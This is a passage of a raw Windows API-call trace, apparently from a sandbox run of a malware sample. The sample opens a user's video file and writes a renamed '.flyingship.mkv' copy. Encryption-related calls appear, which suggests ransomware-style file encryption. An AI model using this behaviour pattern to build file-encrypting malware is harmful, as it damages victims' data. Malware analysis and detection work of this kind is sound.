lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0196.828] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.828] CryptDestroyHash (hHash=0x90ae18) returned 1 [0196.828] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.828] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.828] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.828] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.828] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.828] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\_4x_cnshky.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0196.829] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.829] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0196.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0196.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0196.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0196.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0196.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0196.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0196.830] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0196.830] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0196.831] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0196.831] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0196.832] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1")) returned 0x10 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0196.832] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0196.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0196.832] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0196.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.833] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0196.833] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\_4X_CNShky.flyingship.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\_4x_cnshky.flyingship.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0196.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0196.838] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0196.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0196.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0196.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0196.839] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.839] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.839] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0196.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0196.840] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0196.840] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0196.840] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x4953, lpOverlapped=0x0) returned 1 [0196.842] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4953) returned 0x900190 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0196.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4953) returned 0xbea018 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4953) returned 0x900190 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.843] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0196.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0196.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0196.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0196.844] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0196.844] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0196.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0196.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c27f8 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4953) returned 0x900190 [0196.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26a8 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0196.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0196.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0196.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2658 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0196.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba570 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4953) returned 0xbee978 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0196.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0196.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0196.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0196.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0196.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0196.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0196.846] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0196.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0196.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0196.865] 